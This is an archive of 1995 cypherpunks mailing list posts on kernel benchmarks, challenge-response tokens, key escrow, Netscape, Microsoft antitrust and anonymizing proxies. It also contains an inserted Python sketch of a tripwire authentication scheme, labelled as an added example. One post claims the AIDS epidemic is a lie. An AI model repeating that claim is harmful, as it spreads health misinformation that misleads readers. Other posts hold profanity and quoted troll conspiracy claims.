* Linux pimpinel.fluido.org 1.2.10 #59 Tue Jun 13 09:46:17 MET DST 1995 i486
* Tue Jun 27 10:18:13 MET DST 1995

To:
* Linux pimpinel.fluido.org 1.3.51 #79 Wed Dec 27 19:16:06 MET 1995 i486
* Wed Dec 27 22:41:23 MET 1995

*******
Results
*******

Process Creation Test                  ||    119.9 ->    375.0  +212.76%
Pipe-based Context Switching Test      ||   3446.9 ->  10194.8  +195.77%
Dc: sqrt(2) to 99 decimal places       ||   5906.2 ->  11034.2   +86.82%
Execl Throughput Test                  ||     51.6 ->     81.5   +57.95%
Shell scripts (8 concurrent)           ||     10.0 ->     13.0   +30.00%
Shell scripts (1 concurrent)           ||     78.3 ->    101.2   +29.25%
Shell scripts (4 concurrent)           ||     21.0 ->     26.8   +27.62%
Shell scripts (2 concurrent)           ||     41.0 ->     52.3   +27.56%
C Compiler Test                        ||     42.2 ->     52.4   +24.17%
Dhrystone 2 without register variables ||  46284.2 ->  49808.7    +7.61%
File Write (30 seconds)                ||   8911.0 ->   9356.0    +4.99%
Recursion Test--Tower of Hanoi         ||    709.2 ->    724.3    +2.13%
System Call Overhead Test              ||  29238.2 ->  29476.8    +0.82%
Arithmetic Test (type = float)         ||   5055.6 ->   5069.9    +0.28%
Arithmetic Test (type = long)          ||   8353.5 ->   8376.6    +0.28%
Arithmetic Test (type = register)      ||   8353.2 ->   8376.1    +0.27%
Arithmetic Test (type = short)         ||   7496.0 ->   7515.7    +0.26%
Arithmetic Test (type = double)        ||   5056.8 ->   5067.4    +0.21%
Arithmetic Test (type = int)           ||   8353.4 ->   8370.4    +0.20%
Arithmetic Test (type = arithoh)       || 126914.4 -> 127172.0    +0.20%
Dhrystone 2 using register variables   ||  49802.4 ->  49870.6    +0.14%
File Write (10 seconds)                ||   8100.0 ->   7680.0    -5.19%
Pipe Throughput Test                   ||  18512.0 ->  17227.1    -6.94%


--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

Enjoy!
Carlo

--
  *                                          ...Ma appena fuori tutto e' gomma,
* K * Carlo E. Prelz - fluido@marktest.pt     tutto e' cicca impiastricciata...
  *                                     (Marco Zappa-Niente cicca nella scuola)




--
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 31 Dec 1995 17:44:15 +0800
To: lmccarth@cs.umass.edu
Subject: Re: (fwd) Benchmarks - revs 1.3.50 & 51
In-Reply-To: <199512310841.DAA09404@thor.cs.umass.edu>
Message-ID: <199512310846.TAA07013@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> And the cypherpunk relevance is....<drum roll>...?
> 
>[...] linux kernel stats

Absolutely zero. Yours truly pressed the wrong key.

--Proff

+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 1 Jan 1996 10:19:20 +0800
To: vin@shore.net
Subject: Re: Australian "calculatorcard"
Message-ID: <01HZGYUZMNJ88Y5682@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: vin@shore.net (Vin McLellan)

>        Could be one of seven or 8 vendors of so-called
>"challenge/response" tokens or calculators.  Most of those sold in the US
>and Australia use straight DES (and a token-specific key) to encrypt the
>"random" challenge number in the token -- but it could be any secret-key
>algorithm.
-----------

	This is actually something cryptographic which I know a bit about,
so I'll tell you what I know. I had a suitemate a bit back who was working
for a local high-tech company as a computer programmer. He used a system
somewhat like this, but with some interesting permutations.
	The main difference was that it didn't use one algorithm. It used quite
a few, determined by a hashing of the challenge code. There were a considerable
number of challenge codes with distinct hash results that were never used. If
the card got too many of those (or too many wrong PINs), it switched to an
entirely different set of hashings and encryptions, all of which would warn the
server (thanks to their turning out something different in a hash function on
the server) that the card had been compromised. I suspect it would also wipe an
EEPROM that was storing the valid hash function and algorithms, but he wasn't
sure about that. It was all sealed in a plastic block to make sure it was
physically hard to reverse-engineer, anyway.
	-Allen
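
The scheme described in the message above (challenge hashed to pick an algorithm, never-issued hash values acting as tripwires, a silent switch to responses the server recognises as an alarm), as an added example that is not part of the original post or any vendor's code. HMAC-SHA-256 with a per-slot label stands in for the card's unnamed algorithms; the slot count, strike limit and all names are assumptions.

```python
import hashlib
import hmac
import itertools
import secrets

SLOTS = 16                                   # assumed size of the selection table
LIVE_SLOTS = frozenset(range(0, SLOTS, 2))   # slots the server actually issues
MAX_STRIKES = 3                              # assumed tolerance before the switch
NORMAL, ALARM = b"normal", b"alarm"          # the two algorithm families


def slot_of(challenge: bytes) -> int:
    """Hash the challenge to pick which algorithm slot answers it."""
    return hashlib.sha256(b"slot|" + challenge).digest()[0] % SLOTS


def respond(key: bytes, family: bytes, challenge: bytes) -> str:
    """Per-slot keyed function (stand-in for the card's distinct algorithms)."""
    label = family + b"|" + bytes([slot_of(challenge)]) + b"|"
    return hmac.new(key, label + challenge, hashlib.sha256).hexdigest()[:8]


class Token:
    def __init__(self, key: bytes, pin: str):
        self.key, self.pin = key, pin
        self.strikes = 0
        self.family = NORMAL

    def _strike(self) -> None:
        self.strikes += 1
        if self.strikes >= MAX_STRIKES:
            # One-way switch; the post suspects the card also wiped its EEPROM.
            self.family = ALARM

    def answer(self, pin: str, challenge: bytes):
        if not hmac.compare_digest(pin.encode(), self.pin.encode()):
            self._strike()
            return None
        if slot_of(challenge) not in LIVE_SLOTS:
            self._strike()   # never-issued slot: somebody is probing the card
        # Always answer, so a prober cannot tell tripwire slots from live ones.
        return respond(self.key, self.family, challenge)


class Server:
    def __init__(self, key: bytes):
        self.key = key

    def new_challenge(self) -> bytes:
        """Rejection-sample so that issued challenges only land in live slots."""
        while True:
            challenge = secrets.token_bytes(8)
            if slot_of(challenge) in LIVE_SLOTS:
                return challenge

    def verify(self, challenge: bytes, response) -> str:
        if response is None:
            return "reject"
        for family, verdict in ((NORMAL, "ok"), (ALARM, "compromised")):
            if hmac.compare_digest(response, respond(self.key, family, challenge)):
                return verdict
        return "reject"


def first_challenge(live: bool) -> bytes:
    """Deterministic challenge that does (or does not) hash to a live slot."""
    for i in itertools.count():
        challenge = i.to_bytes(8, "big")
        if (slot_of(challenge) in LIVE_SLOTS) == live:
            return challenge


def demo() -> list:
    key = bytes(range(16))                    # constructed key, for the demo only
    server, token = Server(key), Token(key, "4821")
    verdicts = []
    c = server.new_challenge()
    verdicts.append(server.verify(c, token.answer("4821", c)))   # normal login
    trap = first_challenge(live=False)        # a challenge the server never sends
    for _ in range(MAX_STRIKES):
        token.answer("4821", trap)            # card is being fed tripwire values
    c = server.new_challenge()
    verdicts.append(server.verify(c, token.answer("4821", c)))   # next real login
    return verdicts


if __name__ == "__main__":
    print(demo())
```

The server learns of the switch only at the next genuine login, because the alarm is carried in-band by the response itself.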




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 1 Jan 1996 06:06:49 +0800
To: Mike Johnson <cypherpunks@toad.com>
Subject: SHATEST (was: Re: DOS - MD5 - Thanks)
Message-ID: <199512312155.QAA03270@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Dec 1995 15:22:46 -0700 (MST), you wrote:

I've got a little goodie called SHATEST which I'm going to include
with the next release of the NOISE.SYS driver.. it's the Secure Hash
equivalent of MD5SUM...

(Originally written to test the optimized SHA code-- much thanks to
Colin Plumb, BTW--- for the /dev/random driver...)

--Rob

>A freestanding implementation of MD5SUM (compiled from that in the PGP 
>distribution) for DOS is at
>ftp://ftp.csn.net/mpj/public/md5sum.zip and on the Colorado Catacombs BBS 
>at 303-772-1062.

>I suggested to Phil Zimmermann that he should put this in the next PGP 
>release along with the compiled DOS version of PGP, but there hasn't been 
>a new release of PGP since then.

>Happy New Year!

Ditto...

>Mike Johnson
>mpj@exabyte.com

>#include <std_disclaimer.h>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 1 Jan 1996 12:55:05 +0800
To: groundfog@alpha.c2.org
Subject: Re: For the New Year: A Symbol for Information Freedom
In-Reply-To: <199601010311.WAA12624@mail.FOUR.net>
Message-ID: <Pine.SV4.3.91.951231232901.9522E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't agree that the market is different than the people.

And I hope that Information Freedom doesn't become as trivialized, 
trendy, and the property of dilettantes as the red-ribbon AIDS shtick.

There is a danger to holding up the AIDS hullabaloo as a role model. To
wit, the AIDS activists have committed themselves to a lie - that AIDS is
an epidemic, a generalized threat to society. They are riding a tiger by
the tail, for when the actual facts seep into the consciousness of the
unwashed masses - which might never really happen, given the reality of
our "whoever puts out their press release first, gets awarded the
Conventional Wisdom seal-of-approval" journalism - then the
AIDS-industrial complex is going to be in trouble. 

So, on with the paperclips - only, let's make sure that no Hollywood
celebrities are allowed to participate. It's the kiss of death.... 

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an201465@anon.penet.fi (Scryptor)
Date: Mon, 1 Jan 1996 08:36:36 +0800
To: cypherpunks@toad.com
Subject: throwaway
Message-ID: <9512312345.AA13971@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



[from: WEIRDNUZ.410 (News of the Weird, Dec 15, 1995 by Chuck Shepherd)]

LEAD STORY

* A 62-year-old woman pleaded guilty in Roanoke, Va., in November to
stealing about 500 pieces of mail from her neighbors' mailboxes--her third
such offense in five years. She had been found sane and competent for trial
but nonetheless diagnosed as having an "irresistible impulse" to steal
other people's mail. The judge had kept her confined to her home since her
arrest, allowing her full freedom only on Sundays, when there is no mail
delivery. [Roanoke Times, 11-21-95]


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Thu, 21 Dec 95 05:13:46 PST
To: cypherpunks@toad.com
Subject: cyphernomicon
Message-ID: <199512211313.IAA11974@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone is interested I would be willing to e-mail a copy of the
cyphernomicon to you.
BEWARE that it is 1.3MB in file size and 414 pages in text.
Charles Donald Smith Jr.
582 Clifton Rd. N.E.
Atlanta, Ga. 30307-1787
(404)-378-7282





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 21 Dec 95 01:03:57 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: King Kong Does e$
In-Reply-To: <199512201719.JAA12291@jobe.shell.portal.com>
Message-ID: <30D92197.7C87@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> But this influence is making us a target of companies who know that
> gaining our approval, or at least avoiding our criticism, is important
> for success on the net.  In many cases, such as the recent flap over
> Netscape's attitudes towards key escrow, I detect a whiff of two
> sidedness, in which one attitude is presented for the benefit of
> government and law enforcement interests, while another posture, more
> acceptable to cypherpunks, is adopted on the net.

  At the NIST meeting our representative made a strong statement
against the government's GAK proposal, and government interference
with crypto in general.  If I'm not mistaken that was a government
and law enforcement forum.  We want to sell (and give away) products
that contain strong encryption, and our customers want to buy it.
We are beginning to take a more active role in trying to achieve
this goal.  It's not happening fast enough for me either, but it
is happening.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Thu, 21 Dec 95 01:03:10 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512210902.BAA03598@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 AM 12/21/95 GMT, "Bill Gates" wrote:

[...]

>Evidently the cypherpunks are all too impressed
>with Blaze and Weinstein's master's degrees to see
>what's really happening.  Only true visionaries
>like myself and Dr. Frederic B Cohen are telling
>it like it is; everyone else has had the wool
>pulled over their eyes by the NSA/ATT/Netscape axis.
>
>It's amazing how clear everything becomes once
>one stops taking the medication that THEY prescribed.
>
>s/ Bill Gates

Oh, I see. I think you misspelled "troll". Hope this helps.
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 21 Dec 95 01:54:28 PST
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <30D92D80.1CED@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


ECafe Anonymous Remailer wrote:
> 
> I'm not trying to start a flame war. I'm
> sure these people are very smart and have
> written lots of good code. I'm sure they're
> very nice and never kick their dogs.  I'm
> just tired of people defending them as
> cypherpunks.
> 
> They aren't cypherpunks.
> 
> Neither has come out against GAK. They
> both carefully avoid committing to any
> statement. They want us to think they're
> "one of us" but they don't want to be
> pinned down because they are double dipping
> on both sides of the fence.

> Weinstein is actively promoting GAK by
> working at the company that the government
> has chosen to bring it to you now that
> att has failed.

  I am against GAK.  I have been contributing to EFF for
years.  I have written and faxed my representatives in congress
stating my position against both GAK and government censorship
of the net.  The reason I'm working on security code at netscape
is that I think the only way to foil the government's
plans to remove all privacy from its citizens may be mass market
strong encryption software.

  Why do you believe that Netscape has been chosen by the
government to bring GAK to the masses?  Because of the
uninformed and misguided comments of Jim Clark?  Jim has been
educated and the company has taken a firm position against
government control of crypto.  When you go to the store today
and buy netscape you get strong encryption out of the box,
without any GAK.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert Heffren" <RDHeffren@gnn.com>
Date: Thu, 21 Dec 95 04:00:32 PST
To: sameer@c2.org>
Subject: Re: COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE
Message-ID: <199512211159.GAA01454@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 19 Dec 95, sameer <sameer@c2.org> wrote;

> COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE
> Community ConneXion today announced a new service for its customers
> which will make secure, private electronic commerce more accessible
> to all merchants, from the small single-person business to large
> corporations trying to sell goods and services over the
> world-wide-web.

There went the neighborhood. The Prez and the Coalition on one side
and big biz on the other. AOL and their stings, all the motherfuckers
spamming the piss out of everybody else and every place you turn, some
swinging dick wants to put his goddamn hand in your pocket.

Fuck it! Shut this sonfabitch down and take up doll-collecting.

Who NEEDS this bullshit!

Unsub this bastard AND gone;


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMNlMrBMzypiVqpjNAQG/fAL9GS5NiWR/5mb+KbKwxp2wSB6MUliwJaEV
uBb+a7F5s7PQ0lQEWfujPKIoaF/iCB0zRKN0yLWCuvNiQe3YWMnwn5WggPekDRPl
0b3u37WHmeCKyhamMixnyK4w7jjT2use
=WaxG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 21 Dec 95 05:10:05 PST
To: cypherpunks@toad.com
Subject: Microsoft Flame[tm] [NOISE]
Message-ID: <951221.063231.9N5.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There's a lot of finger waving going on over Microsoft's alleged
predatory practices.  I just want to remind the pro-MS folks of
something.  Microsoft has a documented track record of using
undocumented entry points in their OS and Windows products.  These entry
points allow MS apps to do some things more efficiently than a
competitor which uses the published API.  MS has been known to
rearrange these undocumented calls, resulting in sudden
incompatibilities with competitors.  (remember when Win3.1 came out and
DR-DOS was suddenly unable to run Windows?)  And in the MS countersuit
against Stac Electronics, MS successfully argued that undocumented
system calls were protected as Trade Secret material.

While this isn't the grand-scale conspiracy some people seem to see,
IMHO it's still predatory.  Perhaps the call to separate the OS and apps
divisions is a good idea.  It would be interesting to see if Microsoft
could maintain its edge in applications when it had no sub rosa
advantage in OS access.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNlXShvikii9febJAQFoGgP/YtHdGqO8++MfZmk3h61F8SmJBfPYfa1R
JlccdIP9BZHVXZseao9b9DqxLY1xRYkK6fWETielJaSjXZKam1WlYKFzL5E8Hf1z
IXQmj7rCIIfvqvq3byJq8B3IUbT4UnTMNDAHVlNUwkzrcJ+py8czsWtNy15g3ahY
NzYL8UsOtwI=
=MpV3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 21 Dec 95 04:39:15 PST
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Gates history
In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com>
Message-ID: <9512211235.AA29804@all.net>
MIME-Version: 1.0
Content-Type: text


Not that this subject matter is relevant to cypherpunks, but...

> cpunk relevance: operation of the free market
???

> Gates' conquests can either be made out to be a failure of the free enterprise 
> system or a success from it. the more I read whining complaints about MS's
> dominance, the more I prefer the latter interpretation. perhaps power 
> corrupts, but on the other hand failure clearly promotes whining. "you cannot
> grow taller by chopping off the heads of others".

I respectfully disagree with the analogy.  In a competitive market
economy, you can indeed grow larger by killing off the competition.  In
fact, that's the whole idea of unfettered capitalism.  This was tried
100 years ago and the result was monopolies which in the end eliminated
competition and ended up reducing innovation and productivity while
increasing prices.  Then the US government decided to end this by
introducing laws to limit monopolies.  They broke up AT+T and essentially
forced IBM to become weak in the name of fairness, but when Bill Gates
brought Microsoft into the same position, the government failed to act
(and is continuing to do so).  This is (in my opinion) because Ron
Reagan was so influential as president and heavily favored unfettered
free trade. 

> I've seen so many people try to smear MS with innuendo, as if "enough people
> being unhappy" at a company is ample evidence that there is "unfairness".
> the marketplace is *not* fair. it rewards people who are in tune with it
> disproportionately!! sometimes, *dramatically*so* as in the case with Gates.

Innuendo or not, there are clear facts that have been widely documented
regarding Microsoft (Bill Gates doesn't run it alone you know!).  Among
them are:

	- Microsoft forces dealers to buy only Microsoft software bundles
	if they want to use ANY microsoft products in their PCs at discount
	prices.

		I have been personally caught in this one.  I had a calendar
		product a few years back that was marketed to about 1,000 of
		the largest microcomputer dealers and bundlers in the US.  Not
		one would buy the product, and the reason they gave was that
		they were not allowed to bundle any non-Microsoft-approved
		software without losing their ability to sell the Microsoft
		bundles.

		This is not a case of sour grapes - it's just plain fact. That
		is what the dealers said - not just one of them.

	- Microsoft has historically used undocumented operating system calls
	which they provided details on to select software companies and which
	they used for their own products, but which they did not release
	to the greater market place.  Without the use of these undocumented calls,
	many operating system features were not usable.

		The net effect was that companies not on the Microsoft chosen list
		were delayed in delivering new versions of products to meet new
		versions of operating systems, giving Microsoft and companies they
		worked with a market advantage.

	- Microsoft holds a dominant market position.

		This is a necessary component of the situation because if the
		same facts held for a non-dominant company, it would be within
		bounds of the law and would not stifle free trade.	

> a market for [x] gizmos does not even exist. a brilliant
> person says, " I think people really need [x] gizmos. I'm going to make and
> sell them. I'm going to find people who will help me, but if I can't find any
> I'm going to do it all myself".

Nobody is disagreeing with this.  That is the desirable part of what
Gates and Microsoft did - 20 years ago.  But the standards we hold and
the requirements we place on companies increase with their size and
market dominance.  This is done in the name of keeping a thriving
competitive environment.  In today's environment, Microsoft is
dominating the market and thus reducing innovation (or so the theory
goes) by using anticompetitive methods, and that is the issue.

	In my personal opinion, they are doing something far worse.  By
	dominating the market with inferior products, they are essentially
	forcing the world to build an artificially weakened global network
	environment.  The net effect will be years of new versions of the
	Microsoft product line without a single bug fix (they call them
	feature enhancements).

> Gates is such a person and did it with PC OS'es and various windows 
> applications (Excel, Word Perfect, etc.). he bet his entire future on
> the idea that he knew what people wanted even when other companies disagreed.

This is factually inaccurate.

	Microsoft created inferior versions of existing products that
	have only come to market dominance because of anticompetitive
	methods.  For example, Excel has numerous bugs and produces
	wrong answers at a rate far in excess of 123.  It is truly an
	inferior product, and yet it now dominates the market - solely
	because it is bundled with other microsoft products and because
	interoperation between 123 and Microsoft products is delayed due
	to undocumented features and changes in the underlying Microsoft
	operating system. 

	Microsoft did not bet its fortune, nor did Bill Gates, on Excel,
	WordPerfect, or any other of their applications.  With a few
	exceptions, they took existing products, built their own versions,
	used inside information and their dominant market position to force
	the products on PC dealers, and continue to do so.

...
> the truth is that the playing field has always been level, but because Gates
> is  such a brilliant genius, market anticipator, and gizmo producer, he
> succeeds far beyond his or anyone else's wildest dreams.

It's just not accurate.  IBM, until recently, was barred from selling more than
a certain dollar value worth of units.  Bill Gates didn't build Microsoft alone
either.  He has thousands of employees.  Admittedly he was a driving force, but
his team members are largely responsible for his success, and I think he would
readily agree to this if you asked him.

> the market has *given* bill gates his dominance. all the arguments about
> him being "unfair" are absolutely bogus that I have seen. they amount to,
> "Bill Gates is using tactics to sell more of his software than his competitors.
> therefore, he's not being fair to everyone else who wants to sell their
> software as well."

That's not what people are saying.  They are saying that Microsoft is
breaking the law of the land and has been for a long time and that is
why they have market dominance.  Whether the law has been broken or not,
you are mischaracterizing what has been said about Microsoft.

Enough of this - sorry for the noise, and let's get back to what
cypherpunks are about - cyphers.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 21 Dec 95 08:34:44 PST
To: Jeff Weinstein <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512211634.IAA22811@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>ECafe Anonymous Remailer wrote:
(A bunch of ridiculous nonsense)

At 01:48 AM 12/21/95 -0800, Jeff Weinstein wrote:
>  I am against GAK.  I have been contributing to [...]

Please do not reply to silly trolls.  By replying, you 
act as if what this loon said mattered.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Thu, 21 Dec 95 05:29:49 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <951221083022.2460067b@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> MIT is practically floating on government subsidies.

   It's funny how the grass is always greener somewhere else...

                           Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Thu, 21 Dec 95 08:52:59 PST
To: roy@cybrspc.mn.org
Subject: Re: Microsoft Flame[tm] [NOISE]
Message-ID: <m0tSoES-000RuKC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:32 AM 12/21/95 CST, Roy M. Silvernail wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>There's a lot of finger waving going on over Microsoft's alleged
>predatory practices.  I just want to remind the pro-MS folks of
>something.  Microsoft has a documented track record of using
>undocumented entry points in their OS and Windows products.  These entry
>points allow MS apps to do some things more efficiently than a
[snip]
>
>While this isn't the grand-scale conspiracy some people seem to see,
>IMHO it's still predatory.  Perhaps the call to separate the OS and apps
>divisions is a good idea.  It would be interesting to see if Microsoft
>could maintain its edge in applications when it had no sub rosa
>advantage in OS access.

IMHO, I see nothing wrong with predatory behavior.. then again, I hunt in
the fall, so it must be a redneck thing..

MS and any of the other software companies are competing for domination in a
narrow field.. MS just happens to be the only real choice for OS anymore..
well, for a standard, out of the box OS anyways. The fact that they have to
leave in undisclosed hooks to get their own software to excel over others
just points to the poor software they produce overall. 

I have to admit that I like, possibly admire, the way Bill and crew have
captured the market.. from a marketing standpoint, they did a first rate job
of running with the ball until there was no pursuit.. Sure, from time to
time, someone tries to throw a blocker in their path, but they just overrun
it and keep going.. Forget about the monopoly aspects for a second and look
at MS as an American success story. It has all the classic elements: started
small, with a crew of social misfits and eventually grew up.

Just a few cents worth..
RobL
------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Dec 95 09:10:01 PST
To: blancw@accessone.com
Subject: Re: FTC Privacy Initiative (fwd)
In-Reply-To: <9512210144.AA04101@pulm1.accessone.com>
Message-ID: <199512211704.JAA12536@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	"Hey, we can't just stand around here with nothing to do.
> 	Give us something to regulate - anything, pro or con; we
> 	must regulate something."

	Gah. Just what we need, a law to do what technology can do
better. Sometime early next year community connexion will be running
an anonymizing web proxy, located on high bandwidth pipes to major
interchange points. Stay tuned.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Dec 95 06:34:10 PST
To: hallam@w3.org
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <9512210012.AA19612@zorch.w3.org>
Message-ID: <199512211432.JAA00971@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> On the one hand we have the screaming libertarians with a bunch of 
> wedged political notions about property. On the other we have what 
> appear to be arch anti-capitalists claiming that nobody who earns
> a living out of crypto can be a cypherpunk. What is really strange
> is that these appear to be the _same_ people.

No, Phil. We have just one person who's an annoying nutcase who's been
bothering us, and lord knows what he really thinks.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Dec 95 06:37:17 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org>
Message-ID: <199512211437.JAA00982@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rolling on floor...

.pm

ECafe Anonymous Remailer writes:
> I'm not trying to start a flame war, just telling
> people what's REALLY happening.
[...]
> ATT and Netscape are both tools of the CIA/NSA.
[...]
> Evidently the cypherpunks are all too impressed
> with Blaze and Weinstein's master's degrees to see
> what's really happening.  Only true visionaries
> like myself and Dr. Frederic B Cohen are telling
> it like it is;
[...]
> It's amazing how clear everything becomes once
> one stops taking the medication that THEY prescribed.
> 
> s/ Bill Gates




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 21 Dec 95 06:50:04 PST
To: John Young <jya@pipeline.com>
Subject: Re: KOD
In-Reply-To: <199512202258.RAA13656@pipe2.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951221093459.4338t-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, John Young wrote:

> >Can you reveal who they are?  No way am I going to buy 
> >Newsweek to  find out.
> 
> Anyone out of Newsweek's range, return this msg, empty, to me 
> to get the 50 mugshots, then ... sort out the living from the 
> dead.

I send for copies of John's articles almost every day (thanks, John).
I was fooled this time because the reply codes are ALWAYS of the form
AAA_bbb, and this time it was just AAA.  It went right by me.  There
must be a psychology lesson in here somewhere.

So did Pipeline finally upgrade their software, or what?

> Best not to cypherdunk the already nym-shot victims. Privacy is 
> paramount, bellows this list, no?

Um, sure, John.

Cypherpunk relevance: There's apparently an encrypted message in
John's last paragraph above.  A free T-shirt to the first person to
find it.

   --D.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
